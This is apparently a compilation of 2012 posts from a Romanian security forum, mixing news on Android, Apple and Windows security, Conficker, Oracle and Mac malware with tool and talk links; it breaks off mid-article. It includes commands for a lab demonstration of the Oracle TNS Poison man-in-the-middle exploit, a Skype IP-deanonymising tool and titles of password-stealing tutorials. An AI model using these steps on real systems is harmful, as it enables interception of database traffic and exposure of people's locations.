Nytro

Smecheria cu salariile mari e ca de cele mai multe ori se semneaza contracte pe perioade mari de timp, probabil asa e si aici, daca semneaza pe 2-3 ani, deja in 6 luni stie de ajuns ca sa merite acel salariu (bine, 1 an sa zicem), apoi devine "profitabil" pentru firma.

[h=2]Android Ported to C#[/h] Oracle and Google are currently in a $1 billion wrestling match over Google’s use of Java in Android. But Java is not the only way to build native apps on Android. In fact, it’s not even the best way: we have been offering C# to Android developers as a high-performance, low-battery consuming alternative to Java. Our platform, Mono, is an open source implementation of the .NET framework that allows developers to write their code using C# while running on top of the Java-powered operating system, and then share that same code with iOS and Windows Phone. Unlike Sun with Java, Microsoft submitted C# and the .NET VM for standardization to ECMA and saw those standards graduated all the way to ISO strong patent commitments. The .NET framework is also covered by Microsoft’s legally binding community promise. Last July when Xamarin was getting started, we got our team together in Boston to plan the evolution of Mono on iOS and Android. After a day of kayaking in the Charles River, we sat down to dinner and turned our attention to how we could improve the performance and battery life of applications on Android, and make our own Mono for Android even better. The Xamarin team after a day of Kayaking, back when we were a small company Over and over we came back to the basics: Dalvik is a young virtual machine, it is not as performant or tuned as Mono and suffers from many of Java’s performance limitations without the benefit of the high-end optimizations from Oracle’s HotSpot. One crazy idea that the team had at that dinner was to translate Android’s source code to C#. Android would benefit from C# performance features like structures, P/Invoke, real generics and our more mature runtime. Although nothing happened back in July, this idea stuck in the back of our minds. Fast forward a few months: Mono for Android is doing great, and we are starting to think again about improving our own product’s performance on Android. What if we could swap out Java with faster C# and get rid of various Dalvik limitations in the process? Could we create an Android phone completely free of Java, and free of the limitations of the Dalvik VM? We decided it was crazy enough to try. So we started a small skunkworks project with the goal of doing a machine translation of Android from Java to C#. We called this project XobotOS. [h=2]The XobotOS Research Project[/h]The result of our efforts is that today we have most of Android’s layouts and controls entirely in C#. Here are some screenshots of XobotOS running on a Linux workstation, no Java involved: Getting to this point required that the majority of the Android Java code be translated from Java to C#, so what you see above represents very significant progress. So how did we do it? [h=2]Java Translation via Sharpen[/h]Android’s core codebase contains over a million lines of Java code, and we knew we wanted to be able to stay up to date with new releases of Android — in fact, we started with the Android 2.x source code back in 2011, and then upgraded XobotOS to Android 4.0 when Google open sourced Ice Cream Sandwich earlier this year. So for us, the only reasonable option was to do a machine translation of Java to C#, building and maintaining any necessary tools along the way. The tool we used as a starting point is called Sharpen. Sharpen is famous for helping people such as Frank Krueger port a Java applet to an award-winning iPad app in two months. We matured Sharpen a lot, and the result is a much-improved Java-to-C# translation tool for everyone. We are releasing this new version of Sharpen today along with the code for XobotOS and we hope that many more people will benefit from it and contribute to it. [h=2]Performance[/h]So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik? So once you have Android running on Mono, the obvious question is — how does Mono perform compared to Dalvik? When C# came around, Microsoft modified the language in a couple of significant ways that made it easier to optimize. Value types were introduced to allow small objects to have low overheads and virtual methods were made opt-in, instead of opt-out which made for simpler VMs. Later on, Java and C# diverged in the way that they implemented generics. Java went with a full-backwards compatibility approach, while C# baked the support into the runtime. The C# approach led to a simple-to-use, simple-to-understand generics setup as well as being much more performant and complete. Since then, both the language and the execution environment have continued to evolve and improve. C# went from being a slightly better Java to be light-years ahead. From embracing dynamic programming, bring asynchronicity into the language, introduce iterators, functional programming constructs, embrace parallelism and got a great implementation of generics. Many of the these features came from the research done by Don Syme and his F# team that have kept a steady flow of new ideas getting injected into the language. Furthermore, Mono as a virtual machine has matured substantially in the last 10 years and is now considered to be on its 8th generation. All of this adds up. You can see the massive difference in the performance of structs and generics in this benchmark we ran of a simple binary tree implementation in Java and C#: [h=2]What’s Next[/h]Today we’re proud to announce that we’ve made XobotOS available on github so that you can try it out yourself. Our goal as a company is to provide the best platform for building mobile apps, and so XobotOS will not be a focus for us going forward. But it was a fun experiment to run, and as it turns out, a few technologies have come out of the effort that we’ll be able to include in future versions of our products: Direct Graphics Access to Skia: Currently Mono for Android accesses the underlying graphics libraries through Java, with the code that we built for XobotOS, we will skip the middleman and use Mono’s P/Invoke to get straight to the native rendering code in Skia. Java to C# tooling: Our new version of Sharpen is available as part of our XobotOS release. Replacing Java code with C# code we now have the tools necessary to replace some chunks of Java code with C# code where performance is critical and when C# can offer better solutions than Java has. Our plan is to take elements of the research project and integrate those into our products. A project that we started because we thought it would be fun to do has turned out to yield some serious benefits for our products. It’s important for a startup to stay focused, but sometimes you have to try something crazy to make progress. And who knows, maybe Google will thank us some day . Xamarin is hiring for many positions to advance the state of the art in mobile development. Sursa: Android Ported to C# – Xamarin

Legat de Microsoft Windows, pentru cei care sunt sceptici la securitatea sistemelor Windows... Windows Firewall: Group policy editor: File permissions: Si multe altele. Windows nu e tocmai "inapt" la capitolul securitate, de fapt, dupa parerea mea sta cel mai bine la acest capitol, iar Linux si alte sisteme de operare mai au mult pana sa ajunga la nivelul sau, problema e simpla "utilizatorii". Cati or sta sa isi configureze reguli in firewall sau sa puna restrictii pe foldere? Nimeni. De aceea eu ma astept sa nu se planga nimeni. Windows are cu ce, dar nu are cu cine. Deci Microsoft are tot dreptul sa ii ia peste picior pe Apple.

Updated: Yet Another Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities Exploit writing: A basic Idea. Subterfuge - Man-in-the-Middle Attack Framework Tutorial Angajatii lui Zuckerberg se imbogatesc inca de la angajare Ms12-027 Mscomctl Activex Buffer Overflow Metasploit Demo(Ipv6) Arbitrary File Upload And Bypassing Protections(Dvwa) Dos Attack On Win8 With Hping3 (Packet Flooding) Spoofing Dns With Nmap Fast Track Script Social Engineer-Toolkit And Windows Credentials Editor Microsoft Windows Eot Font Table Directory Integer Overflow. Athcon 2010 Mobile Privacy: Tor On The Iphone And Other Unusual Devices Athcon 2010 "The Dhcp Recession: Extended Dhcp Exhausting Attack" Athcon 2011 Exploiting Anti-Reversing Techniques Athcon 2011 Win32 Exploit Development With Pvefindaddr + Project Quebec Arp/Dns Spoofing Steal Facebook Password (Lan Environment) Privilege Escalation via "Sticky" Keys Oracle discloses new zero day exploit and launches JDK for OS X SyScan 2012 Singapore slides Windows 8 Forensic Guide An interesting case of Mac OSX malware Targeting ZeroAccess Rootkit’s Achilles’ Heel Facebook source code hacker explains,what really happened ! Bitdefender USB Immunizer https://www.facebook.com/rstforum Facebook: https://www.facebook.com/rstforum

[h=1]How far behind is Apple's security?[/h]Paul Wagenseil, SecurityNewsDaily Managing Editor Kaspersky Lab founder Eugene Kaspersky made headlines last week when he declared that Apple was "10 years behind Microsoft in terms of security." Kaspersky was referring to the recent spread of the Flashback family of malware, which was greatly aided by Apple's long delay in patching a known software flaw. But is Apple really 10 years behind the times? "I'd say that Apple's got another 10 years to go before their security will become as much of a laughingstock as Microsoft's," said Jonathan Zdziarski, author of "Hacking and Securing iOS Applications" (O'Reilly, 2012) and a forensic scientist who hacks into iPhones for Chicago-based viaForensics. "Comparing Apple and Microsoft is like comparing apples and oranges," said Mikko Hypponen, chief security officer of Finnish anti-virus firm F-Secure. (Msnbc.com is a joint venture of Microsoft and NBCUniversal.) [FAQ: The New Mac Virus and Apple Anti-Virus Options] Trustworthy computing– Kaspersky's choice of 10 years as the time frame was not random. In January 2002, then-Microsoft chairman Bill Gates issued his famous "Trustworthy Computing" memo to all company personnel. He wrote it shortly after the release of Windows XP, when the brand-new platform was under constant attack by virus writers and hackers. "Every week there are reports of newly discovered security problems in all kinds of software, from individual applications and services to Windows, Linux, Unix and other platforms," Gates wrote in the memo. "Our responsiveness has been unmatched — but as an industry leader we can and must do better. ... Eventually, our software should be so fundamentally secure that customers never even worry about it." Gates' memo inaugurated a companywide focus on security, an aspect that had been neglected for the first two decades of Microsoft's existence. Ten years later, Windows 7 users still need to worry about malware, but Microsoft's current platform is tremendously much stronger and more secure than Windows XP. (Even today, XP, not Windows 7, gets the most malware attacks.) "Microsoft has improved their security massively since 2002," Hypponen said. "Today, they are [a] model for good security process in many ways." Microsoft got to that point by essentially outsourcing Windows security. The entire anti-virus industry, with sales of several billion dollars per year, is built on defeating malware that targets Windows. The existence of that industry frees up Microsoft to work on patching its Windows, which it does extensively every month. Microsoft's open model lets major Windows software makers such as Adobe or Oracle do the same without Microsoft's approval. Go your own way Apple, on the other hand, disdains third-party anti-virus software for Macs — though it does exist — and insists on patching certain pieces of third-party software itself. The Flashback software flaw, discovered in January, was patched for Windows in three weeks. It wasn't patched for Macs until after nearly three months — and after an estimated 600,000 Macs worldwide had been infected. "Apple needs to learn the meaning of transparency," Zdziarski said. "They need to communicate with their user base and with the security community. They need to be quicker to respond to threats." He pointed out that Apple's closed-lipped attitude also applies to iOS, the software that runs the iPhone, iPad and iPod Touch. "Some iOS attacks from the past took months to fix," Zdziarski said. "The [iPhone] jailbreak community had fixes out for users before Apple did. That's shameful." Qualified kudos Despite the secrecy, and despite the lack of attacks on Mac OS X, Apple has for many years incorporated the latest security innovations into its operating systems. "Apple might have some sort of an attitude problem, which shows in their slow patch cycles and so [on]," Hypponen said. "But otherwise, it's hard to critique them with all they've done with OS X: app sandboxing, memory randomization, NX [non-executable memory] support, [the] App Store model." When the iPhone was introduced, Apple was starting from scratch on a brand-new operating system. It took the opportunity to bake advanced security features into iOS from the very beginning. "[The] iPhone (or actually, iOS) is a massive security success," Hypponen said. "iOS is now 5 years old and we still haven't seen a single malware attack against it." Zdziarski wasn't sure how long that blissful interlude would last. "With Objective-C applications now on over 100 million-plus devices, the threat is very real," he said, referring to the programming language used to create Mac OS X and iOS software. "It's only a matter of time before a serious worm hijacks tens of millions of devices and thousands of App Store apps at once, and similar on the desktop," Zdziarski said. "Flashback seemed small potatoes; more of a warning that Apple runs the risk of screwing up as big as Microsoft in letting poor design lead to widespread attacks." Sursa: How far behind is Apple's security? - Technolog on msnbc.com

Bitdefender USB Immunizer Bitdefender USB Immunizer is a free and easy to use tool that helps make sure you transfer the files, not the viruses. It disables autorun-related threats before they access the computer. Once installed, it constantly watches for newly inserted USB storage devices and immunizes them on the fly. Download: http://labs.bitdefender.com/wp-content/plugins/download-monitor/download.php?id=BDUSBImmunizerLauncher.exe Sursa: Free Anti-Virus Programs, Plugins and Apps - Bitdefender

[h=1]8 Reasons Conficker Malware Won't Die[/h]Poor corporate password practices and continuing use of Autorun help explain why eradicating this three-year-old worm has been so difficult. By Mathew J. Schwartz InformationWeek April 30, 2012 10:37 AM Obstinate. That's how Microsoft has labeled Conficker, which, despite being three years old and targeted for eradication, continues to survive--and even thrive--in corporate networks. As recently as the fourth quarter of 2011, Conficker variants launched 59 million attacks against 1.7 million unique PCs, according to the latest installment of the Microsoft Security Intelligence Report, which reviewed attack trends for the second half of 2011. Whereas most malware disproportionately affects consumers, the report found that Conficker is "more prevalent on domain-joined computers," meaning business machines. Here are eight reasons why killing Conficker remains so tough: 1. Conficker was built to topple business networks. Conficker is designed to persist. All of the worm's payload traffic is encrypted, making infections difficult to spot. The worm can also disable many types of free antivirus software as well as Microsoft Windows Update, thereby disabling automatic security updates. That not only buys the worm time to spread, but can provide a toehold for other malicious software, thus compounding businesses' security problems. 2. The worm spreads via Autorun. More recent variations of Conficker attempt to auto-execute via Autorun, which helps it spread not just via network shares, but also USB keys and other types of removable storage. Accordingly, Microsoft has recommended disabling Autorun. 3. Weak passwords help Conficker. When Conficker first infects a PC, it attempts to use the user's current credentials to copy itself to administrative shares, thereby spreading the infection. If that fails, the worm switches to a more aggressive approach. "Conficker has a small dictionary of passwords that is used in a brute-force attack against other machines in the network, and it continues to be surprisingly effective," said Wolfgang Kandek, CTO of Qualys, in a blog post. How weak or common are these passwords? Try words or numbers such as 0000, 1111, Admin, and coffee. "[Conficker's] dictionary attack is very basic and is prevented even by enforcing simple password composition policies, i.e. adding [numbers] and special characters to only alpha-type passwords," he said. 4. Conficker can remain dormant. If, after trying all of the above, Conficker still fails to spread to admin shares, it will simply hibernate. What brings it back to life? That would be an administrator, using admin credentials to log onto the machine, perhaps while investigating a user's reports of suspicious behavior. Once the PC has been accessed using admin credentials, the worm will again attempt to use these permissions to copy itself around the network. 5. Conficker spreads without bugs. Most malware targets known vulnerabilities. But according to Microsoft, the above password-attack vectors accounted for "100% of all recent infection attempts from Conficker targeting ... users on Windows 7 and Windows Vista platforms." Likewise, 91% of Conficker attacks against Windows 2003 machines targeted passwords, while only 9% targeted a vulnerability patched by Microsoft in October 2008. 6. Repeat outbreaks are common. Conficker's continued spread highlights the ongoing use of weak passwords. "During the first quarter of 2011, the average number of times Conficker attacked a single computer was 15, but by the fourth quarter that number had more than doubled to 35," reported Microsoft. The sheer volume of repeat attacks suggest that businesses are failing to eradicate Conficker from every PC inside the enterprise after they detect an infection. As a result, copies of the worm persist, triggering subsequent outbreaks. 7. Virtualization may stoke the worm's spread. Some security watchers see virtualization as another culprit behind Conficker's continued existence. "'VM sprawl'--or the idea that a virtual machine can be easily created and then archived--means there are many virtual machines offline without security updates. Then, when these machines are brought back online, they can get re-infected very easily," said Kapil Raina, a director at Zscaler, via email. "With today's move to the cloud and leveraging services like AWS EC2, there are many, many virtual machines without proper patching. It's like a time bomb waiting to happen when they come back online." 8. Businesses ignore security basics. Want to keep Conficker out of your enterprise? Keep antivirus definitions up to date, disable Autorun, and assess any potential risk you could face if your company uses outdated, virtualized operating systems. Finally, get tough on passwords. "A single computer with a weak password could easily be enough to cause a major disruption inside a corporate network, especially considering the increasing trend in the number of Conficker attacks per computer," said Joe Blackbird of the Microsoft Malware Protection Center (MMPC), in a blog post. Sursa: 8 Reasons Conficker Malware Won't Die - Security - Vulnerabilities and threats - Informationweek

[h=2]UK High Court: ISPs Must Block Access To The Pirate Bay[/h] by FREDERIC LARDINOIS posted 12 Hours Ago The British Phonographic Industry (BPI) finally got its will today. According to a ruling by Britain’s High Court, UK Internet providers must now block access to Swedish file-sharing site The Pirate Bay. The BBC reports that the BPI had asked British ISPs to voluntarily block access to the site in November 2011. At that time, though, the ISPs said they wouldn’t do so unless ordered by a court. That court order has now arrived. Five UK ISPs (Sky, Everything Everywhere, TalkTalk, O2 and Virgin Media) have already announced that they will comply with this order. BT asked the court for more time to consider its position. According to the BPI’s chief executive Geoff Taylor, “the High Court has confirmed that The Pirate Bay infringes copyright on a massive scale. Its operators line their pockets by commercially exploiting music and other creative works without paying a penny to the people who created them.” A number of studies, though, have questioned this line of reasoning and instead found that sites like The Pirate Bay actually have a positive impact on overall music sales. A spokesperson for Virgin Media told the BBC that it will comply with the ruling, but that the company also “strongly believes that changing consumer behaviour to tackle copyright infringement also needs compelling legal alternatives, such as our agreement with Spotify, to give consumers access to great content at the right price.” Today’s ruling is not a first for Europe. Courts in the Netherlands, Belgium, Finland, Denmark and Italy already issued similar rulings over the last few years. Sursa: UK High Court: ISPs Must Block Access To The Pirate Bay - TechCrunch

[h=3]Security Week In Review, April 23-27[/h] Infections and exploits plagued this week in security, affecting everything from the Mac OS X to Oracle database servers. High profile leaks and a passage of a controversial information sharing bill also graced the security landscape. Here’s a look at April 23-27. VMware Source Code Leaked: Last week, VMware confirmed an attack that led to the online publication of source code for its ESX hypervisor and said that more could be on the way. The individual stepping up to take credit for the attack was a hacker going by the handle of Hardcore Charlie, who also claimed responsibility for another hack on military contractor China National Import & Export Corp earlier this month. “The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers. VMware proactively shares its source code and interfaces with other industry participants to enable the broad virtualization ecosystem today,” said Iain Mulholland director of the VMware Security Response Center, in a blog post. Hardcore Charlie also tweeted that he possessed EMC source code, which he said he also planned to post. Microsoft Fixes Hotmail Password Flaw: Redmond patched a password reset vulnerability in its Hotmail Web mail service last week that potentially exposed its more than 360 million users to account compromises. Specifically, the glitch enabled miscreants with a Firefox add-on to circumvent security restrictions and remotely reset the password of a Hotmail account by modifying the data, while also enabling them to decode CAPTCHA and send automated values over the MSL Live Hotmail module. When the reset button was hit, hackers could then manipulate the requests and put in their own reset information. Luckily for Hotmail’s 360 million users, the bug was discovered and repaired in a relatively short window of time. Microsoft got wind of the vulnerability April 20 and issued a fixed the following day. The fix went public at the end of last week. House Passes CISPA Bill: The controversial Cyber Information Sharing and Protection Act passed in the House of Representatives by a vote of 248 to 168 at the end of last week, despite a strong public backlash from privacy advocates and academia who asserted that the move violated privacy rights. Specifically, the bill, supported by firms such as Facebook, financial trade associations, AT&T, utilities, Intel, and several tech companies, among others, gives the federal government a lot of leeway to share classified cyber threat information with U.S. companies. The bill also simultaneously eliminates many restrictions to information sharing between organizations. The bill’s chief supporter and architect Mike Rogers applauded the legislation as a move in the right direction toward the comprehensive protection of U.S. networks against cyber spies and thieves from Russia and China. However, CISPA’s opponents, including the Center for Democracy and Technology, as well as the ACLU, called the bill ‘overly broad’ and contended that it would serve to erode users’ Internet freedoms and privacy. Oracle Suffers Critical Glitch: A critical vulnerability enabling remote code execution in all versions of the Oracle database server remains unpatched even after Oracle attempted to fix the flaw with its April Critical Patch Update, according to reports circulating last week. Specifically, the vulnerability, occurring in the TNS Listener service, a function which routes connection requests from clients to the server, allows attackers to intercept server traffic and execute malicious commands on the system. The vulnerability exists in all Oracle versions, affecting customers using 8i, 9i, 10g, and 11g (11g R2). If exploited, a remote attacker has complete control of the data exchanged between the server database and the client machines, which paves the way for miscreants to hijack users’ sessions and inject code to do their malicious bidding. Oracle recently patched the flaw TNS Listener service in its April update. However it turns out that the fix didn’t apply to current versions of the Oracle database, leaving many customers subject to arbitrary attacks aiming to exploit the vulnerability. New Flashback Variant Attack Macs: Yet another Flashback variant was discovered sweeping through users’ Mac OS X machines last week. This time, Mac security firm Intego reported the pesky Mac malware installs on users’ computers without requiring a password. The latest Flashback version, known as Flashback.S, inserts itself in one of the user’s home folders that include ~/Library/LaunchAgents/com.java.update.plist or ~/.jupdate. Once it has completely installed itself, the malware then deletes all files and folders in ~/Library/Caches/Java/cache in order to eliminate the applet from the infected Mac, and avoid detection or sample recovery, according to Intego. The Mac-focused Flashback Trojan was first discovered in September 2011, impersonating a bogus Adobe Flash Player installer. The malware has since gone on a rampage against the Mac OS X platform with numerous variants that have exploited a slew of Java vulnerabilities, ultimately infecting as many as 650,000 machines, according to reports. by Stefanie Hoffman | April 30, 2012 at 5:05 pm Sursa: Security Week In Review, April 23-27 | Fortinet Security Blog

[h=1]CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration[/h] [h=4]Timeline :[/h] Vulnerability discovered by Joxean Koret in 2008 Vulberability reported to the vendor by Joxean Koret in 2008 Public release of the vulnerability in Oracle CPU by the vendor the 2012-04-17 Details and PoC of the vulnerability released by Joxean Koret the 2012-04-18 Fake patching of the vulnerability discovered by Joxean Koret the 2012-04-26 [h=4]PoC provided by :[/h] Joxean Koret [h=4]Reference(s) :[/h] Oracle CPU of April 2012 Joxean Koret details and PoC CVE-2012-1675 Oracle Security Alert for CVE-2012-1675 [h=4]Affected version(s) :[/h] All versions of Oracle Database [h=4]Tested with :[/h] Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 [h=4]Description :[/h] Usage of Joxean Koret PoC require that the database name has a length of 6 characters. Database server characteristics : IP : 192.168.178.150 Oracle version : 10.2.0.4.0 Database listener port : 1521 Database listener has no clients IPs restrictions Database name : arcsig Database username : arcsig Database password : testtest Database client characteristics : IP : 192.168.178.151 SQL*Plus version : 10.2.0.4.0 “tnsnames.ora” file as bellow : TARGET.DB= (DESCRIPTION = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.178.150)(PORT = 1521)) (CONNECT_DATA = (SERVICE_NAME= arcsig) ) ) Attacker characteristics : IP : 192.168.178.100 Usage of PoC provided by Joxean Koret [h=4]Demonstration :[/h] PoC validation phase On database server : ifconfig ps faux netstat -tan On database client : ifconfig sqlplus -v cat tnsnames.ora sqlplus arcsig@TARGET.DB HELP QUIT PoC exploitation phase On attacker : Start the MITM proxy, how will intercept the communication between the client and the database : sudo python proxy.py -l 192.168.178.100 -p 1521 -r 192.168.178.150 -P 1521 Start the vulnerability exploitation : python tnspoisonv1.py 192.168.178.100 1521 arcsig 192.168.178.150 1521 On the database client : Connect with SQL*Plus sqlplus arcsig@TARGET.DB ? ? INDEX TOTO QUIT You can see that the communication are intercepted by the proxy. Sursa: CVE-2012-1675 Oracle Database TNS Poison 0Day Video Demonstration

[h=3]Facebook source code hacker explains,what really happened ![/h] Software development student Glenn Mangham, 26, was freed earlier this month after appeal judges halved the eight-month prison sentence he was given for infiltrating and nearly bringing down the multi-million-dollar site. Glenn Mangham, of York, England, posted a lengthy writeup on his blog and a video, saying that he accepts full responsibility for his actions and that he did not think through the potential ramifications. "Strictly speaking what I did broke the law because at the time and subsequently it was not authorised," Mangham wrote. "I was working under the premise that sometimes it is better to seek forgiveness than to ask permission." Initially convicted to 8 months in prison, the Court of Appeal in London decided that there weren’t any ill intentions on the hacker’s behalf, the judges deciding not only to release him, but also to allow him to use the Internet once again. After criticizing the CSO for attacking him while he was locked up, Mangham explained in detail why he took the Facebook source code, why he didn’t use any proxies to cover up his tracks and he even revealed the exact amount of damage he believed his actions had caused. http://www.youtube.com/watch?v=emzOZH1-v9E&feature=player_embedded

Linux Memory Images We make these sample Linux memory images available in the hope they may be useful for research, training, testing, or other purposes. If you find them to be of value, please drop us a line via the contact form on this web site. hem to be of value, please drop us a line via the contact form on this web site. [TABLE] [TR] [TH]Filename[/TH] [TH]Size[/TH] [TH]Hash[/TH] [TH]Description[/TH] [TH]BitTorrent Download[/TH] [/TR] [TR=class: alt] [TD]centos-5.6-i386-kbeast.mem.bz2[/TD] [TD]705266494 bytes (673MB)[/TD] [TD]sha256sum[/TD] [TD]This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 2GB RAM, running from a CentOS 5.6 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here.[/TD] [TD]Magnet Link[/TD] [/TR] [TR] [TD]ubuntu-10.04-i386-kbeast.mem.bz2[/TD] [TD]480042093 bytes (458MB)[/TD] [TD]sha256sum[/TD] [TD]This is a bzip2-compressed memory image taken from a VirtualBox VM allocated 1GB RAM, running from an Ubuntu 10.04.3 LiveCD, infected with the kbeast rootkit. Memory was acquired via the VirtualBox dumpguestcore command, as described here.[/TD] [TD]Magnet Link[/TD] [/TR] [/TABLE] Sursa: Second Look

[h=3]An interesting case of Mac OSX malware[/h] msft-mmpc 30 Apr 2012 4:20 PM In June 2009, Microsoft issued security update MS09-027, which fixed a remote code execution vulnerability in the Mac version of Microsoft Office. Despite the availability of the bulletin (and the passage of time), not every machine is up to date yet – which is how nearly three years later, malware has emerged that exploits the issue on machines running Office on Mac OS X. Fortunately, our data indicates that this malware is not widespread, but during our investigation we found a few interesting facts we’d like to share with you. For our investigation, we used a malware sample (SHA1: 445959611bc2480357057664bb597c803a349386) that is detected as Exploit:MacOS_X/MS09-027.A. Figure 1 - Overall Execution Flow Firstly, the vulnerability is a stack-based buffer overflow - the attack code could corrupt variables and return addresses located on the stack. As we analyzed the malware, we found that the malware author managed to corrupt a local variable and used that corrupted variable to deploy 'stage 1' shellcode to a designated area. This corrupted variable is later used for a target address and is where the stage 1 shellcode is copied. The corrupted return address points to this target address as well. This target address is important, as, with Snow Leopard, we could confirm that it was used to exploit a specific location on the heap that is writable and also executable. The point is, that with Lion, that specific memory address can't be written, so the exploit fails. We can assume that this malware itself is targeting only Snow Leopard or lower versions of Mac OSX. That means the attacker had knowledge about the target environment beforehand. That includes the target operating system, application patch levels, etc. Figure 2 Stage 1 Shellcode This stage 1 shellcode leads to stage 2 shellcode, which is located in memory. The stage 2 shellcode is actually where the infection of the system occurs. The stage 2 shellcode creates three files: /tmp/launch-hs /tmp/launch-hse /tmp/file.doc Figure 3 File Creation by Stage 2 Shellcode As you can see from the above picture, the exploit attack code uses typical Unix style shellcode to run system calls. So far, this is nothing new. Later in the shellcode, the file "/tmp/launch-hs" is executed by a system call to "execve" to execute commands. The contents of "/tmp/launch-hs" should be a shell script or executable. Figure 4 Execution of /tmp/launch-hs script file We looked into the the contents of the "/tmp/launch-hs", and it appears like following: Figure 5 /tmp/launch-hs script contents It is just a tiny shell script that runs "/tmp/launch-hs" and and opens "/tmp/file.doc". The file "/tmp/launch-hse" should be the main binary that contains all the malicious code. Also "/tmp/file.doc" is a fake document file that will be displayed to the user to deceive the user from seeing any abnormalities or malicious symptoms. The main payload file is "/tmp/launch-hse" - it is a Mach-O format, or standard executable format, for Mac OSX. This binary a command and control (C&C) agent that communicates with a C&C server (master) to perform unauthorized actions that are similar to other C&C bot clients. The function names give clues that might indicate that this binary is connecting to a C&C server, parses command from it and performs file retrieval or creates process. Figure 6 Peek into the function names gives you an idea. The main difference about this malware is that it is written for Mac OSX. For example, if you look into a "RunFile" function, which runs a command on the infected machine, you can see that it's a Mac OSX version of backdoor. Basically it runs a command supplied from the C&C server. Figure 7 RunFile function In conclusion, we can see that Mac OSX is not safe from malware. Statistically speaking, as this operating system gains in consumer usage, attacks on the platform will increase. Exploiting Mac OSX is not much different from other operating systems. Even though Mac OSX has introduced many mitigation technologies to reduce risk, your protection against security vulnerabilities has a direct correllation with updating installed applications. If you're using Microsoft Office 2004 for Mac, Microsoft Office 2008 for Mac or Open XML File Format Converter for Mac, be sure to update using the latest product updates. For this specific vulnerability, you can visit the Microsoft Security Bulletin MS09-027 page and download the update. Jeong Wook (Matt) Oh MMPC Sursa: An interesting case of Mac OSX malware - Microsoft Malware Protection Center - Site Home - TechNet Blogs

SIP home gateways under fire The SIP home gateway -- which combines a NAT router, a SIP proxy, and analogue phone adapters -- is the weakest link in a Voice over IP network. SIP's numerous source routing mechanisms share the well-known security weaknesses of IP source routing. The talk discusses possible exploits and countermeasures. Telephony is steadily moving to Voice over IP, opening up a world of hacking opportunities. While many security issues have long been addressed in standardization, real-world VoIP suffers from incomplete and sometimes broken implementations. SIP home gateways -- which combine a NAT router, a SIP proxy, and a phone adapter are especially at risk. The predominant VoIP protocol SIP (Session Initiation Protocol) has been designed as an -- almost -- stateless protocol. The network elements responsible for call routing only keep very little and short-lived state. This makes SIP highly scalable and substantially simplifies fail-over. To achieve this, SIP uses source routing mechanisms extensively. Due to its security weaknesses, the network layer protocols have long abandoned the idea of source routing, despite its theoretical appeal. Some IP source routing attacks and countermeasures can be applied to SIP. [TABLE=class: datatable] [TR] [TD=class: highlight]Authors[/TD] [TD=class: lowlight] Wolfgang Beck [/TD] [/TR] [TR] [TD=class: highlight]Submitted[/TD] [TD=class: lowlight]May 01, 2012[/TD] [/TR] [/TABLE] Download: [/B]http://mirror.fem-net.de/CCC/27C3/mp3-audio-only/27c3-4181-en-sip_home_gateways_under_fire.mp3[B] Sursa: IT Security and Hacking knowledge base - SecDocs

Terrorists Win - Exploiting Telecommunications Data Retention Telecommunications data retention (TDR) has become a reality in most Western countries. Protagonists claim that the collection of massive amounts of data on the communication behavior of all individuals within a country would enable law enforcement agencies to exploit patterns in the stored data to uncover connections between suspects. While this is obviously true for investigations after an incident happened, there is up to now no critical and sound assessment publicly available that evaluates whether TDR brings any pro-active benefits for the above mentioned, justified purposes. In this talk we give for the first time a critical assessment of the power of TDR based on methods from information theory. To this end we have employed agent based simulations, which mimic the communication behavior of a large community including a dark-net of alleged suspects. The structure and statistics of our telecommunication simulation, which drive the dynamics of telephone calls and simulated TDR data, were generated according to known statistics of real-world telecommunications networks. Hiding in the unavoidable noise seems to be a passive strategy for terrorists to circumvent pro-active detection. This stems from a "needle in the haystack"-problem, that arises due to the small number of conspirators compared to the number of other participants. In particular situations and with adopted strategies suspected terrorists might be able to eventually exploit TDR for their purposes and take an active approach to hiding in the crowd. Such TDR exploits would lower the probability of detection by law enforcement agencies and render TDR a potential security threat. Again, we use our simulations and our analysis procedure to assess this problem. Authors Kay Hamacher Stefan Katzenbeisser Submitted May 01, 2012 Download: http://mirror.fem-net.de/CCC/27C3/mp4-h264-HQ/27c3-4055-en-terrorists_win_exploiting_telecommunications_data.mp4 Sursa: IT Security and Hacking knowledge base - SecDocs

Windows 8 Forensic Guide Download: http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf

[h=1]SyScan 2012 Singapore[/h] Parent Directory Day1-1 Chris Valasek & Tarjei Mandt/ Day1-2 Loukas Kalenderidis/ Day1-3 Ryan MacArhur & Beist/ Day1-4 Aaron LeMasters/ Day1-5 James Burton/ Day1-6 Jon Oberheide/ Day2-10 Edgar Barbosa/ Day2-6 Alex Ionescu/ Day2-7 Stefan Esser/ Day2-8 Brett Moore/ Day2-9 Paul Craig/ Slides: http://www.xchg.info/ARTeam/conferences/SyScan%202012%20Singapore/

[h=1]Skype-iplookup[/h] Perform obscure ip lookup for online skype accounts. Can find local and remote ip address. Require craked SkypeKit with deobfuscated debug logs. Online: http://skype-ip-finder.tk/ Source code: https://github.com/zhovner/Skype-iplookup

[h=3]Announcing SSL Pulse[/h] [h=2]April 30, 2012[/h] Last week we announced SSL Pulse, a continuously updated dashboard that is designed to show the state of the SSL ecosystem at a glance. While it is possible today to deploy SSL and to deploy it well, the process is difficult: the default settings are wrong, the documentation is lacking, and the diagnostic tools are inadequate. For these reasons, we cannot say that the Web is yet secure, but we hope that someday it will be. The purpose of SSL Pulse is to bring visibility to SSL implementation issues on the Web, and while businesses are starting to fix these issues we can keep track of progress made towards making SSL more robust and widely adopted on the Internet. SSL Pulse is based on the assessment technology and testing conducted by SSL Labs. The underlying data set draws from the information on about 200,000 SSL web sites that represent the most popular web sites in the world. We cherry-picked only the most important data points, focusing especially on those aspects where improvements are needed. We have so far conducted only one round of testing, but, when the next month’s results become available, we will start to show historic values and hopefully see improvements for each data point. So what do the results tell us? Looking at the SSL Labs grades, which are designed to sum up the quality of SSL configuration, we can see that about 50% (99,903 sites) got an A, which is a good result. Previous global SSL Labs surveys reported about 33% well-configured sites, which means that more popular sites are better configured. Unfortunately, many of these A-grade sites (still) support insecure renegotiation 